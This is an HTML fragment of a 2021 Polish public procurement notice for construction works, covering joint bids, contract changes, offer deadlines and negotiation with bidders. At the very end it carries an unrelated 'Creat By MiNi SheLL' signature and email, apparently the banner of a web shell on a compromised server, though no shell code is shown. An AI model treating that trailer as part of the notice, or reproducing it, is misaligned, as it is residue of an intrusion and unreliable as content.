Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postę-powaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wypełniony druk oświadczenia, wg Załącznika Nr 2 do SWZ składa każdy z Wykonawców wspólnie ubie-gających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>4.	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykona-nie zamówienia, określoną w art. 366 Kodeksu Cywilnego.<br/>5.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>6.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawarte we wzorze umowy - załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-02 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">˜miniportal Wykonawca składa ofertę za pośdrednictwem Formulara do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena oferty brutto</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com